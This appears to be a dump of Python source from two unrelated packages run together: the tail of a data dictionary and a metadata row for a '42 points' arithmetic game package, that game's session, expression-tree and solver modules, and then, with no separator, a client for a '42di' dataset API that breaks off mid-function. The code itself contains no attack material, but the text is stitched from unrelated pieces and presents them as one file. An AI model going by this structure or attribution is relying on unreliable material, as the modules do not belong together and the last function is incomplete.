(9, 12, 12, 13, 13): 3,
(9, 12, 13, 13, 13): 3,
(10, 10, 10, 10, 11): 1,
(10, 10, 10, 11, 12): 2,
(10, 10, 10, 12, 12): 1,
(10, 10, 10, 12, 13): 1,
(10, 10, 10, 13, 13): 1,
(10, 10, 11, 11, 12): 2,
(10, 10, 11, 11, 13): 1,
(10, 10, 11, 12, 13): 2,
(10, 10, 11, 13, 13): 1,
(10, 10, 12, 12, 13): 3,
(10, 10, 12, 13, 13): 2,
(10, 10, 13, 13, 13): 1,
(10, 11, 11, 11, 11): 1,
(10, 11, 11, 11, 13): 1,
(10, 11, 11, 12, 13): 2,
(10, 11, 11, 13, 13): 2,
(10, 11, 12, 12, 12): 2,
(10, 11, 12, 13, 13): 2,
(10, 11, 13, 13, 13): 2,
(10, 12, 12, 12, 13): 1,
(10, 12, 12, 13, 13): 1,
(10, 12, 13, 13, 13): 1,
(10, 13, 13, 13, 13): 2
} | 42Points | /42Points-1.2.7-py3-none-any.whl/ftptsgame/database.py | database.py |
import datetime
from .expr_utils import Node, build_node
from .problem_utils import Problem
class FTPtsGame(object):
    """
    The main game.
    Available methods (+ means playing, - means not playing):
    __init__(): initialization. (Entry point)
    is_playing(): show the status of current game. (+-)
    generate_problem(): generate a problem manually. (-)
    get_elapsed_time(): get the time elapsed during the game. (+)
    get_current_problem(): get current problem (tuple). (+)
    get_current_solutions(): get current solutions (list). (+)
    get_current_solution_number(): print current solution number. (+)
    get_total_solution_number(): print total solution number. (+)
    start(): start the game. (-)
    stop(): stop the game. (+)
    solve(): put forward a solution and show solution intervals. (+)
    """
    def __init__(self):
        """Start the game session, serving as an initialization."""
        self.__valid = []  # readable answer strings accepted so far
        self.__formula = []  # parsed Node trees, parallel to self.__valid
        self.__players = []  # (player_id, interval) pairs, one per solution
        self.__playing = False  # True between start() and stop()
    def __status_check(self, required_status: bool = True):
        """Raise PermissionError unless the game is in *required_status*."""
        if required_status != self.is_playing():
            raise PermissionError('Required status: %s' % required_status)
    def is_playing(self) -> bool:
        """Indicate the game is started or not."""
        return self.__playing
    def get_elapsed_time(self) -> datetime.timedelta:
        """Get time elapsed since start(). Effective when playing."""
        self.__status_check(required_status=True)
        elapsed = datetime.datetime.now() - self.__timer
        return elapsed
    def generate_problem(self, problem, target=42):
        """Generate a problem manually. Effective when not playing.

        :param problem: iterable of numbers to play with (order ignored).
        :param target: value that solutions must evaluate to.
        :raises ValueError: if the problem has no solution for *target*.
        """
        self.__status_check(required_status=False)
        self.__target = target
        self.__problem = tuple(sorted(problem))
        self.__problem_class = Problem(list(self.__problem))
        self.__problem_class.generate_answers(self.__target)
        if len(self.__problem_class.distinct_answer_table) == 0:
            raise ValueError('No solution found.')
    def get_current_target(self) -> int:
        """Get current target. Effective when playing."""
        self.__status_check(required_status=True)
        return self.__target
    def get_current_problem(self) -> tuple:
        """Get current problem (sorted tuple). Effective when playing."""
        self.__status_check(required_status=True)
        return self.__problem
    def get_current_solutions(self) -> list:
        """Get current valid solutions. Effective when playing."""
        self.__status_check(required_status=True)
        return self.__valid
    def get_current_solution_number(self) -> int:
        """Get the number of current solutions. Effective when playing."""
        self.__status_check(required_status=True)
        return len(self.__valid)
    def get_total_solution_number(self) -> int:
        """Get the number of total distinct solutions. Effective when playing."""
        self.__status_check(required_status=True)
        return len(self.__problem_class.distinct_answer_table)
    def get_remaining_solutions(self) -> list:
        """Get representative strings of unsolved classes. Effective when playing."""
        self.__status_check(required_status=True)
        # Collect the equivalence-class ids already hit by the player(s).
        current_solution_set = set()
        for expr_str in self.__valid:
            node = build_node(expr_str)
            current_solution_set.add(self.__problem_class.equivalence_dict[node.unique_id()])
        return_list = []
        for expr in self.__problem_class.distinct_answer_table:
            if self.__problem_class.equivalence_dict[expr.unique_id()] not in current_solution_set:
                return_list.append(str(expr))
        return return_list
    def get_current_player_statistics(self) -> list:
        """Get (player_id, interval) statistics. Effective when playing."""
        self.__status_check(required_status=True)
        return self.__players
    def __validate_repeated(self, node: Node):
        """Raise LookupError (with the earlier answer) if *node* repeats a class."""
        class_id = self.__problem_class.equivalence_dict[node.unique_id()]
        for ind in range(0, len(self.__formula)):
            cmp_node = self.__formula[ind]
            cmp_class_id = self.__problem_class.equivalence_dict[cmp_node.unique_id()]
            if cmp_class_id == class_id:
                raise LookupError(self.__valid[ind])
    def solve(self, math_expr: str, player_id: int = -1) -> datetime.timedelta:
        """Put forward a solution and show solution intervals if correct.

        :param math_expr: the player's expression (alternate glyphs allowed).
        :param player_id: optional id recorded with the solving interval.
        :return: time elapsed since the previous accepted solution.
        :raises OverflowError: expression too long.
        :raises ValueError: numbers used do not match the problem.
        :raises ArithmeticError: expression does not evaluate to the target.
        :raises LookupError: expression repeats an already-found class.
        """
        self.__status_check(required_status=True)
        # Normalize common alternate glyphs and strip whitespace.
        # NOTE(review): the '(' -> '(' and ')' -> ')' entries are no-ops as
        # written; they presumably mapped fullwidth parentheses (( , )) to
        # ASCII before an encoding loss — confirm against upstream history.
        replace_table = [
            ('×', '*'),
            ('x', '*'),
            ('÷', '/'),
            (' ', ''),
            ('\n', ''),
            ('\r', ''),
            ('(', '('),
            (')', ')'),
        ]
        for src, dest in replace_table:
            math_expr = math_expr.replace(src, dest)
        if len(math_expr) >= 30:
            raise OverflowError('Maximum parsing length exceeded.')
        node = build_node(math_expr)
        user_input_numbers = node.extract()
        if tuple(sorted(user_input_numbers)) != self.__problem:
            raise ValueError('Unmatched input numbers.')
        math_expr_value = node.evaluate()
        if math_expr_value != self.__target:
            raise ArithmeticError(str(math_expr_value))
        self.__validate_repeated(node)
        self.__formula.append(node)
        self.__valid.append(math_expr)
        elapsed = self.get_elapsed_time()
        interval = elapsed - self.__last
        self.__last = elapsed
        self.__players.append((player_id, interval))
        return interval
    def start(self):
        """Start the game. Effective when not playing."""
        self.__status_check(required_status=False)
        self.__valid = []
        self.__formula = []
        self.__players = []
        self.__timer = datetime.datetime.now()
        self.__last = datetime.timedelta(seconds=0)  # A tag for each solution.
        self.__playing = True
    def stop(self) -> datetime.timedelta:
        """Stop the game and return total elapsed time. Effective when playing."""
        self.__status_check(required_status=True)
        elapsed = self.get_elapsed_time()
        self.__playing = False
        return elapsed
import ast
import itertools
from copy import deepcopy
from fractions import Fraction
class Node(object):
    """An expression tree over integers with +, -, *, / (exact Fractions)."""
    NODE_TYPE_NUMBER = 0  # leaf: a literal number
    NODE_TYPE_OPERATOR = 1  # internal: a binary operator
    def __init__(self, _type=NODE_TYPE_NUMBER, ch=None, left=None, right=None):
        """Initialize the node.

        :param _type: NODE_TYPE_NUMBER (leaf) or NODE_TYPE_OPERATOR.
        :param ch: operator character for operator nodes, literal for leaves.
        :param left: left child (operator nodes only).
        :param right: right child (operator nodes only).
        """
        self.type = _type
        self.left = left
        self.right = right
        if self.type == Node.NODE_TYPE_OPERATOR:
            # Operator nodes eagerly cache their evaluated value.
            self.value = Node.operation(ch, self.left.value, self.right.value)
            self.ch = ch
        else:
            self.value = int(ch)
            self.ch = '#'  # sentinel so leaves never match `ch in '+-*/'` tests
    @staticmethod
    def operation(opt, x, y):
        """Basic arithmetic operation between two numbers.

        :raises ArithmeticError: on division by zero.
        """
        if opt == '/' and y == 0:
            raise ArithmeticError('x/0')
        operation_list = {
            '+': lambda x, y: x + y,
            '-': lambda x, y: x - y,
            '*': lambda x, y: x * y,
            '/': lambda x, y: Fraction(x, y)  # exact rational division
        }
        return operation_list[opt](x, y)
    def node_list(self) -> list:
        """Get all nodes of this subtree in in-order (left, self, right)."""
        if self.type == Node.NODE_TYPE_OPERATOR:
            return self.left.node_list() + [self] + self.right.node_list()
        else:
            return [self]
    def unique_id(self) -> str:
        """Return the unique id (prefix/Polish form) of this expression."""
        if self.type == Node.NODE_TYPE_OPERATOR:
            return self.ch + self.left.unique_id() + self.right.unique_id()
        else:
            return '[' + str(self.value) + ']'
    def __repr__(self) -> str:
        """Return the infix string form, parenthesizing only where needed."""
        if self.type != Node.NODE_TYPE_OPERATOR:
            return str(self.value)
        # Parenthesize children whose looser operator would bind wrongly.
        deal_l = self.ch in '*/' and self.left.ch in '+-'
        deal_r = (self.ch in '-*/' and self.right.ch in '+-') or (self.ch == '/' and self.right.ch in '*/')
        left_string = '(' * deal_l + repr(self.left) + ')' * deal_l
        right_string = '(' * deal_r + repr(self.right) + ')' * deal_r
        return left_string + self.ch + right_string
    def evaluate(self, values: dict = None) -> Fraction:
        """Evaluate this expression; *values* optionally substitutes leaves.

        :param values: optional mapping from leaf value to substituted value.
        :return: cached value when no substitution, else the recomputed value.
        """
        if values is None:
            return self.value
        if self.type == Node.NODE_TYPE_OPERATOR:
            return Node.operation(self.ch, self.left.evaluate(values), self.right.evaluate(values))
        else:
            return Fraction(values[int(self.value)])
    def extract(self) -> list:
        """Extract all leaf numbers from the node, left to right."""
        if self.type == Node.NODE_TYPE_OPERATOR:
            return self.left.extract() + self.right.extract()
        else:
            return [int(self.value)]
    def reduce_negative_number(self):
        """
        Make all intermediate results of this expression not be negative.
        The result of whole expression will become its absolute value.
        """
        def _neg(v1: Fraction, v2: Fraction) -> Fraction:
            # Flip the sign of v1 iff v2 is negative.
            return v1 * (1 - 2 * (v2 < 0))
        if self.type != Node.NODE_TYPE_OPERATOR:
            return self.value
        left_value = self.left.reduce_negative_number()
        right_value = self.right.reduce_negative_number()
        return_value = Node.operation(self.ch, left_value, right_value)
        if self.ch not in '+-':
            # '*' and '/': children are already non-negative after recursion,
            # so only the cached value needs the absolute value.
            self.value = abs(return_value)
            return return_value
        char_map = {'+': 1, '-': -1, 1: '+', -1: '-'}
        left_opt = 1
        right_opt = char_map[self.ch]
        left_opt = _neg(left_opt, left_value)
        left_value = _neg(left_value, left_value)
        right_opt = _neg(right_opt, right_value)
        # NOTE(review): by symmetry with left_value above this looks like it
        # was meant to be _neg(right_value, right_value); harmless as written
        # because right_value is never read again below — confirm upstream.
        right_value = _neg(right_opt, right_value)
        left_opt = _neg(left_opt, return_value)
        right_opt = _neg(right_opt, return_value)
        if left_opt == 1:
            self.ch = char_map[right_opt]
        else:
            # The minus sign ends up on the left operand: swap operands so
            # the subtraction yields a non-negative result.
            self.ch = '-'
            self.left, self.right = self.right, self.left
        self.value = abs(return_value)
        return return_value
    def all_equivalent_expression(self):
        """
        Yield equivalent expressions of this expression (a generator).
        Rule 1 (equivalence by identical equation) is not considered.
        If expression A induces expression B, B may not induce A.
        """
        if self.type != Node.NODE_TYPE_OPERATOR:
            return
        left_equal_list = self.left.all_equivalent_expression()
        right_equal_list = self.right.all_equivalent_expression()
        left_value, right_value = self.left.value, self.right.value
        # Recursively rewrite either child while keeping the other fixed.
        for new_left in left_equal_list:
            yield Node(Node.NODE_TYPE_OPERATOR, self.ch, new_left, self.right)
        for new_right in right_equal_list:
            yield Node(Node.NODE_TYPE_OPERATOR, self.ch, self.left, new_right)
        # Rule 2: x-0 --> x+0
        #         x/1 --> x*1
        #         0/x --> 0*x
        if self.ch == '-' and right_value == 0:
            yield Node(Node.NODE_TYPE_OPERATOR, '+', self.left, self.right)
        if self.ch == '/' and right_value == 1:
            yield Node(Node.NODE_TYPE_OPERATOR, '*', self.left, self.right)
        if self.ch == '/' and left_value == 0:
            yield Node(Node.NODE_TYPE_OPERATOR, '*', self.left, self.right)
        # Rule 3: (x?y)+0 --> (x+0)?y, x?(y+0)
        #         (x?y)*1 --> (x*1)?y, x?(y*1)
        if ((self.ch == '+' and right_value == 0) or
                (self.ch == '*' and right_value == 1)) \
                and self.left.type == Node.NODE_TYPE_OPERATOR:
            yield Node(Node.NODE_TYPE_OPERATOR, self.left.ch, Node(Node.NODE_TYPE_OPERATOR, self.ch, self.left.left,
                                                                   self.right), self.left.right)
            yield Node(Node.NODE_TYPE_OPERATOR, self.left.ch, self.left.left,
                       Node(Node.NODE_TYPE_OPERATOR, self.ch, self.left.right, self.right))
        # Rule 4: (y+z)/x --> (x-y)/z, (x-z)/y when x=y+z
        if self.ch == '/' and self.left.ch == '+' and \
                left_value == right_value and \
                self.left.left.value != 0 and self.left.right.value != 0:
            yield Node(Node.NODE_TYPE_OPERATOR, '/', Node(Node.NODE_TYPE_OPERATOR, '-', self.right, self.left.left),
                       self.left.right)
            yield Node(Node.NODE_TYPE_OPERATOR, '/', Node(Node.NODE_TYPE_OPERATOR, '-', self.right, self.left.right),
                       self.left.left)
        # Rule 5: x*(y/y) --> x+(y-y)
        if self.ch == '*' and self.right.ch == '/' and right_value == 1:
            yield Node(Node.NODE_TYPE_OPERATOR, '+', self.left,
                       Node(Node.NODE_TYPE_OPERATOR, '-', self.right.left, self.right.right))
        # Rule 6: x_1/x_2 --> x_2/x_1
        if self.ch == '/' and left_value == right_value:
            yield Node(Node.NODE_TYPE_OPERATOR, '/', self.right, self.left)
        # Rule 7: Changing two sub-expressions which have the same result
        # doesn't change the equivalence class of this expression.
        left_node_list = self.left.node_list()
        right_node_list = self.right.node_list()
        for nl, nr in itertools.product(left_node_list, right_node_list):
            if nl.value == nr.value:
                # Swap the two equal-valued subtrees in place, snapshot the
                # whole tree, then swap back to restore the original.
                nl.type, nl.left, nl.right, nl.ch, nl.value, \
                    nr.type, nr.left, nr.right, nr.ch, nr.value = \
                    nr.type, nr.left, nr.right, nr.ch, nr.value, \
                    nl.type, nl.left, nl.right, nl.ch, nl.value
                yield deepcopy(self)
                nl.type, nl.left, nl.right, nl.ch, nl.value, \
                    nr.type, nr.left, nr.right, nr.ch, nr.value = \
                    nr.type, nr.left, nr.right, nr.ch, nr.value, \
                    nl.type, nl.left, nl.right, nl.ch, nl.value
        # Rule 8: 2*2 --> 2+2
        #         4/2 --> 4-2
        if self.ch == '*' and left_value == 2 and right_value == 2:
            yield Node(Node.NODE_TYPE_OPERATOR, '+', self.left, self.right)
        if self.ch == '/' and left_value == 4 and right_value == 2:
            yield Node(Node.NODE_TYPE_OPERATOR, '-', self.left, self.right)
    def unique_id_for_rule_1(self, values_list: list) -> tuple:
        """
        Return the unique id of this expression under leaf substitution.
        Two expressions is equivalent by rule 1 iff they have the same id.
        """
        results = [self.evaluate(values) for values in values_list]
        return tuple(results)
def _build_node(node) -> Node:
    """Convert an AST node to an expression ``Node``.

    Only binary +, -, *, / over plain integer literals are accepted; any
    other construct (names, calls, floats, bools, unary operators, ...)
    is rejected.

    :param node: an ``ast`` expression node from ``ast.parse``.
    :return: the equivalent expression-tree ``Node``.
    :raises SyntaxError: if the AST contains a disallowed construct.
    """
    node_ref = {ast.Add: '+', ast.Sub: '-', ast.Mult: '*', ast.Div: '/'}
    if isinstance(node, ast.BinOp) and type(node.op) in node_ref:
        return Node(_type=Node.NODE_TYPE_OPERATOR,
                    ch=node_ref[type(node.op)],
                    left=_build_node(node.left),
                    right=_build_node(node.right))
    # ast.Constant replaces the deprecated ast.Num (slated for removal);
    # `type(...) is int` deliberately rejects bool (a subclass of int).
    if isinstance(node, ast.Constant) and type(node.value) is int:
        return Node(_type=Node.NODE_TYPE_NUMBER, ch=node.value)
    raise SyntaxError('Unallowed operator or operands.')
def build_node(token: str) -> Node:
    """Parse *token* (an arithmetic expression string) into a Node tree.

    The resulting tree is normalized so that no intermediate result is
    negative (see ``Node.reduce_negative_number``).
    """
    parsed = ast.parse(token, mode='eval')
    expr_tree = _build_node(parsed.body)
    expr_tree.reduce_negative_number()
    return expr_tree
import random
import itertools
from .expr_utils import Node
class Problem(object):
    """A 42-points problem: numbers plus all answers grouped by equivalence."""
    def __init__(self, problem):
        """Initialize the problem.

        :param problem: list of the numbers available in this problem.
        """
        self.problem = sorted(problem)
        self.answer_table = []  # every valid answer expression (Node)
        self.distinct_answer_table = []  # one representative per class
        self.equivalence_dict = {}  # expression uid -> representative uid
        self.__parent = {}  # union-find parent pointers, keyed by uid
        self.__rank = {}  # union-find ranks, keyed by uid
    def __root(self, uid):
        """Union-find: return the root of *uid*, with path compression."""
        if self.__parent[uid] == uid:
            return uid
        else:
            self.__parent[uid] = self.__root(self.__parent[uid])
            return self.__parent[uid]
    def __union(self, uid1, uid2):
        """Union-find: merge the classes of *uid1* and *uid2* by rank."""
        uid1 = self.__root(uid1)
        uid2 = self.__root(uid2)
        if uid1 != uid2:
            if self.__rank[uid1] <= self.__rank[uid2]:
                self.__parent[uid1] = uid2
                self.__rank[uid2] += (self.__rank[uid1] == self.__rank[uid2])
            else:
                self.__parent[uid2] = uid1
    def __classify(self, target):
        """
        Divide all answers into some equivalence classes.
        Returns:
        1. A list including all answers (as expression trees);
        2. A dictionary, for any answer expression save the representative
        expression of its class (as the unique id of expressions).
        """
        # Random substitutions used to detect rule-1 equivalence numerically:
        # expressions equal under every substitution are treated as equal.
        values_list = []
        n = len(self.problem)
        dif = list(set(self.problem))  # different numbers of the problem
        for _ in range(10):
            numbers = random.sample(range(500000, 1000000), len(dif))
            values = {dif[i]: numbers[i] for i in range(len(dif))}
            # 0 and 1 keep their own values so identity behavior is preserved.
            values[0], values[1] = 0, 1
            values_list.append(values)
        answers = _get_all_expr(self.problem, n, target)
        uid_table, uid_r1_table = {}, {}
        for expr in answers:
            uid = expr.unique_id()
            uid_table[uid] = expr
            uid_r1 = expr.unique_id_for_rule_1(values_list)
            if uid_r1 in uid_r1_table:
                # Rule-1 duplicate: attach under the first-seen expression;
                # the lower rank keeps that one as the class representative.
                self.__parent[uid] = uid_r1_table[uid_r1]
                self.__rank[uid] = 1
            else:
                self.__parent[uid] = uid
                uid_r1_table[uid_r1] = uid
                self.__rank[uid] = 2
        # Merge classes linked by the structural rewrite rules (rules 2-8).
        for expr in answers:
            uid1 = expr.unique_id()
            for expr2 in expr.all_equivalent_expression():
                uid2 = expr2.unique_id()
                self.__union(uid1, uid2)
        return_dict = {}
        for expr in answers:
            uid = expr.unique_id()
            return_dict[uid] = self.__root(uid)
        return answers, return_dict
    def generate_answers(self, target: int = 42):
        """Generate all answers divided into equivalence classes."""
        self.answer_table, self.equivalence_dict = self.__classify(target)
        self.distinct_answer_table = []
        for expr in self.answer_table:
            uid = expr.unique_id()
            # An expression is its class representative iff it maps to itself.
            if self.equivalence_dict[uid] == uid:
                self.distinct_answer_table.append(expr)
def _combine_expr(left_set: list, right_set: list):
    """Yield every node formed by joining one left and one right operand.

    '+' and '*' are always emitted; '-' only when the result cannot go
    negative, '/' only when the divisor is non-zero.
    """
    for lhs in left_set:
        for rhs in right_set:
            yield Node(Node.NODE_TYPE_OPERATOR, '+', lhs, rhs)
            yield Node(Node.NODE_TYPE_OPERATOR, '*', lhs, rhs)
            if lhs.value >= rhs.value:
                yield Node(Node.NODE_TYPE_OPERATOR, '-', lhs, rhs)
            if rhs.value != 0:
                yield Node(Node.NODE_TYPE_OPERATOR, '/', lhs, rhs)
def _get_all_expr(problem: list, length: int, target: int) -> list:
    """Return all structurally distinct expression trees over *problem*.

    :param problem: the numbers available at this recursion level.
    :param length: size of the original (top-level) problem; only when
        ``len(problem) == length`` are expressions filtered by *target*.
    :param target: required value for top-level expressions.
    """
    n = len(problem)
    if n == 1:
        return [Node(Node.NODE_TYPE_NUMBER, problem[0])]
    collected = []
    seen_ids = set()
    for mask in itertools.product([0, 1], repeat=n):
        picked = sum(mask)
        if picked == 0 or picked == n:
            continue  # both operand groups must be non-empty
        left_prob = [problem[i] for i in range(n) if mask[i] == 0]
        right_prob = [problem[i] for i in range(n) if mask[i] == 1]
        left_set = _get_all_expr(left_prob, length, target)
        right_set = _get_all_expr(right_prob, length, target)
        for expr in _combine_expr(left_set, right_set):
            if n == length and expr.value != target:
                continue  # at the top level keep only target-hitting answers
            expr_id = expr.unique_id()
            if expr_id not in seen_ids:
                seen_ids.add(expr_id)
                collected.append(expr)
    return collected
from logging import error
import requests
from requests import status_codes
import swagger_client as sw
import json
import pandas
import warnings
from enum import Enum
#warnings.filterwarnings('default')
SSL = True  # module-wide default: build API URLs with https:// when True
TOKEN = None  # module-wide default access token, used when none is passed explicitly
class ResourceType(Enum):
    """Kind of resource a ResourceId addresses, from coarse to fine."""
    INVALID = 0
    TEAM = 1
    PROJECT = 2
    DATASET = 3
    FILE = 4


class ResourceId():
    """Parsed resource URI: endpoint/team_id/project_id/dataset_id/file_name.

    Missing trailing components are left as None; resource_type() reports
    the deepest component present.
    """
    def __init__(self, uri):
        """Parse *uri*; a falsy uri leaves every component as None.

        :raises ValueError: if the URI has more than five '/' components.
        """
        self.endpoint = None
        self.team_id = None
        self.project_id = None
        self.dataset_id = None
        self.file_name = None
        self._parse_uri(uri)

    def _parse_uri(self, uri):
        """Split *uri* on '/' and populate the component fields in order."""
        if not uri:
            return
        s = uri.strip().split('/')
        length = len(s)
        if length < 1 or length > 5:
            raise ValueError("invalid ResourceId: %s" % uri)
        if length > 0:
            self.endpoint = s[0]
        if length > 1:
            self.team_id = s[1]
        if length > 2:
            self.project_id = s[2]
        if length > 3:
            self.dataset_id = s[3]
        if length > 4:
            self.file_name = s[4]

    def resource_type(self):
        """Return the deepest ResourceType this id addresses."""
        if self.file_name:
            return ResourceType.FILE
        elif self.dataset_id:
            return ResourceType.DATASET
        elif self.project_id:
            return ResourceType.PROJECT
        elif self.team_id:
            return ResourceType.TEAM
        else:
            return ResourceType.INVALID

    def team_resource_id(self):
        """'endpoint/team' string, or None when a component is missing."""
        if self.endpoint and self.team_id:
            return '/'.join([self.endpoint, self.team_id])
        else:
            return None

    def project_resource_id(self):
        """'endpoint/team/project' string, or None when incomplete."""
        if self.endpoint and self.team_id and self.project_id:
            return '/'.join([self.endpoint, self.team_id, self.project_id])
        else:
            return None

    def dataset_resource_id(self):
        """'endpoint/team/project/dataset' string, or None when incomplete."""
        if self.endpoint and self.team_id and self.project_id and self.dataset_id:
            return '/'.join([self.endpoint, self.team_id, self.project_id, self.dataset_id])
        else:
            return None

    def file_resource_id(self):
        """Full five-part resource string, or None when incomplete."""
        if self.endpoint and self.team_id and self.project_id and self.dataset_id and self.file_name:
            return '/'.join([self.endpoint, self.team_id, self.project_id, self.dataset_id, self.file_name])
        else:
            return None

    def __str__(self):
        """Return the canonical URI; '' when the id is invalid.

        Fix: previously this returned None for INVALID ids, which made the
        builtin str() raise "TypeError: __str__ returned non-string".
        """
        resource_type = self.resource_type()
        if resource_type == ResourceType.TEAM:
            return self.team_resource_id()
        elif resource_type == ResourceType.PROJECT:
            return self.project_resource_id()
        elif resource_type == ResourceType.DATASET:
            return self.dataset_resource_id()
        elif resource_type == ResourceType.FILE:
            return self.file_resource_id()
        else:
            return ''

    def str(self):
        """Convenience alias for __str__()."""
        return self.__str__()
def _create_sw_client(host, token):
    """Build a swagger ApiClient for *host* authenticated with a bearer token."""
    config = sw.Configuration()
    prefix = "https://" if SSL else "http://"
    config.host = prefix + host + "/api/v1"
    return sw.ApiClient(config, "Authorization", "Bearer " + token)
class Project():
    """Handle to a 42di project, addressed as 'endpoint/team_id/project_id'."""

    def __init__(self, project, access_token=None):
        """Parse the project resource id and open an API client for it.

        :param project: 'endpoint/team/project' resource identity string.
        :param access_token: bearer token; falls back to the module TOKEN.
        :raises ValueError: on a malformed identity or a missing token.
        """
        global SSL
        global TOKEN
        resource = ResourceId(project)
        if not resource.project_resource_id():
            raise ValueError("invalid project resource identity: %s" % project)
        self.host = resource.endpoint
        self.team_id = resource.team_id
        self.project_id = resource.project_id
        # Fall back to the module-level token when none is given explicitly.
        self.access_token = access_token if access_token else TOKEN
        if not self.access_token:
            raise ValueError("access token required.")
        self.sw_client = _create_sw_client(self.host, self.access_token)

    def dataset(self, dataset_id):
        """Return a Dataset handle inside this project."""
        return Dataset(self.team_id, self.project_id, dataset_id,
                       self.sw_client, self.access_token)

    def list_datasets(self):
        """List all datasets of this project."""
        return self.dataset(None).list()

    def table(self, table_name):
        """Deprecated alias of dataset()."""
        warnings.warn("Deprecated, use dataset instead.", DeprecationWarning)
        return self.dataset(table_name)

    def list_tables(self):
        """Deprecated alias of list_datasets()."""
        warnings.warn("Deprecated, use list_datasets instead.", DeprecationWarning)
        return self.list_datasets()
class Dataset():
    """Handle to one dataset (a named collection of data files) in a project."""

    def __init__(self, team_id, project_id, dataset_id, sw_client, token=None):
        self.team_id = team_id
        self.project_id = project_id
        self.dataset_id = dataset_id
        self.sw_client = sw_client
        self.api = sw.DatasetsApi(self.sw_client)
        self.token = token  # raw access token, appended to download URLs

    def list(self):
        """List every dataset in the enclosing project."""
        try:
            return self.api.list_datasets(self.team_id, self.project_id)
        except sw.rest.ApiException as e:
            _err_format(e)

    def get(self, get_schema=False):
        """Return dataset metadata, or None when it does not exist (404)."""
        t = None
        try:
            t = self.api.get_dataset(self.team_id, self.project_id,
                                     self.dataset_id, schema=get_schema)
        except sw.rest.ApiException as e:
            if e.status != 404:
                _err_format(e)
        return t

    def exists(self):
        """True when the dataset exists on the server."""
        return self.get() is not None

    def create(self):
        """Create (upsert) this dataset on the server."""
        try:
            self.api.update_dataset(self.team_id, self.project_id, self.dataset_id)
        except sw.rest.ApiException as e:
            _err_format(e)

    def delete(self):
        """Delete this dataset."""
        try:
            self.api.delete_dataset(self.team_id, self.project_id, self.dataset_id)
        except sw.rest.ApiException as e:
            _err_format(e)

    def update(self, prop, value):
        """Update a single dataset property via an UPDATE patch action."""
        action = sw.PatchAction(action="UPDATE", _property=prop, value=value)
        try:
            self.api.update_dataset_property(self.team_id, self.project_id,
                                             self.dataset_id, body=action)
        except sw.rest.ApiException as e:
            _err_format(e)

    def update_schema(self, schema):
        """Store *schema* (a dict) as the dataset's schema property."""
        self.update("schema", json.dumps(schema))

    def put(self, data, file_name=None, tag=None, content_type=None):
        """Upload *data* as one data file of this dataset.

        :param data: raw request body.
        :param file_name: target file name; blank/None defaults to "0".
        :param tag: optional tag, sent as the X-DI-Tag header.
        :param content_type: MIME type of *data*; blank/None sends "".
        """
        if file_name is None or file_name.strip() == "":
            file_name = "0"
        if tag is None:
            tag = ""
        if content_type is None or content_type.strip() == "":
            content_type = ""
        try:
            self.api.put_dataset_data_file(
                self.team_id, self.project_id, self.dataset_id, file_name,
                x_di_tag=tag, content_type=content_type, body=data)
        except sw.rest.ApiException as e:
            _err_format(e)

    def put_csv(self, df, file_name=None, tag=None):
        """Serialize DataFrame *df* to CSV and upload it."""
        self.put(df.to_csv(), file_name, tag, "text/csv")

    def put_parquet(self, df, file_name=None, tag=None):
        """Serialize DataFrame *df* to parquet and upload it."""
        self.put(df.to_parquet(), file_name, tag, "application/parquet")

    def files(self):
        """List metadata for all data files of this dataset."""
        try:
            return self.api.list_dataset_data_files(self.team_id, self.project_id,
                                                    self.dataset_id)
        except sw.rest.ApiException as e:
            _err_format(e)

    def get_file_meta(self, data_file_name):
        """Return metadata for a single data file."""
        try:
            return self.api.get_dataset_data_file_meta(self.team_id, self.project_id,
                                                       self.dataset_id, data_file_name)
        except sw.rest.ApiException as e:
            _err_format(e)

    def _get_file_url(self, file_name):
        """Resolve the (possibly signed) download URL of one data file."""
        url = '/'.join([self.sw_client.configuration.host, "teams", self.team_id,
                        "projects", self.project_id, "datasets", self.dataset_id,
                        "data", file_name])
        if self.token:
            url += "?token=" + self.token
        r = requests.get(url, allow_redirects=False)
        if r.status_code == 303:
            # The API answers "303 See Other" with the real content location.
            return r.headers.get('Location')
        else:
            # NOTE(review): BaseException kept for backward compatibility with
            # existing callers; a dedicated Exception subclass would be better.
            raise BaseException("Get DataFile content failed: %s" % str(r.status_code))

    def _read_df(self, file_name, content_type):
        """Download one data file and parse it into a pandas DataFrame."""
        url = self._get_file_url(file_name)
        if not url:
            # Fix: previously a missing Location header fell through and
            # handed url=None to pandas (or hit the wrong error branch).
            raise BaseException("Get DataFile content failed: no content location")
        if content_type == "text/csv":
            return pandas.read_csv(url)
        elif content_type == "application/parquet":
            return pandas.read_parquet(url)
        else:
            raise BaseException("File format unsupported.")

    def read(self, file_name=None):
        """Read data files into one concatenated DataFrame.

        :param file_name: optional list of file names to restrict to; all
            files are read when None/empty. (Fix: the default used to be a
            shared mutable [] — now None, same observable behavior.)
        :return: concatenated DataFrame, or None when nothing matched.
        """
        file_name = [] if file_name is None else file_name
        filters = set(file_name)
        dfs = []
        files = self.files()
        for f in files:
            if len(file_name) > 0 and f.name not in filters:
                continue
            df = self._read_df(f.name, f.content_type)
            dfs.append(df)
        return None if len(dfs) == 0 else pandas.concat(dfs)
class Table(Dataset):
    """Deprecated alias of Dataset, kept for backward compatibility.

    Fix: this was previously declared as ``def Table(Dataset):`` — a function,
    not a class — so its nested ``__init__`` was never usable as a constructor
    and also omitted ``self`` in the ``Dataset.__init__`` call.
    """
    def __init__(self, team_id, project_id, table_name, sw_client, token=None):
        warnings.warn("Deprecated, use Dataset instead.", DeprecationWarning)
        Dataset.__init__(self, team_id, project_id, table_name, sw_client, token)
def schema(df):
    """Derive a 42di column-schema dict from a pandas DataFrame.

    Index levels come first (marked key="index"), followed by the data
    columns with their dtype names.
    """
    index_cols = [
        {"name": level_name,
         "data_type": str(df.index.dtype),
         "key": "index"}
        for level_name in df.index.names
    ]
    data_cols = [
        {"name": col, "data_type": str(dtype)}
        for col, dtype in df.dtypes.items()
    ]
    return {"columns": index_cols + data_cols}
def dataset(identity, token=None):
    """Return a Dataset handle for a full dataset resource id string."""
    resource = ResourceId(str(identity))
    if resource.resource_type() != ResourceType.DATASET:
        raise ValueError("invalid resource id: %s" % identity)
    project = Project(resource.project_resource_id(), access_token=token)
    return project.dataset(resource.dataset_id)
def put(identity, data, token=None, content_type='application/parquet', create=True, update_schema=False):
    """Upload *data* to a dataset/file resource id.

    DataFrames are serialized per *content_type* ('text/csv' or
    'application/parquet'); any other content type is sent as a raw body.
    The dataset may be created first, and its schema refreshed from *data*.
    """
    resource = ResourceId(str(identity))
    if resource.resource_type() not in (ResourceType.DATASET, ResourceType.FILE):
        raise ValueError("invalid resource id: %s" % identity)
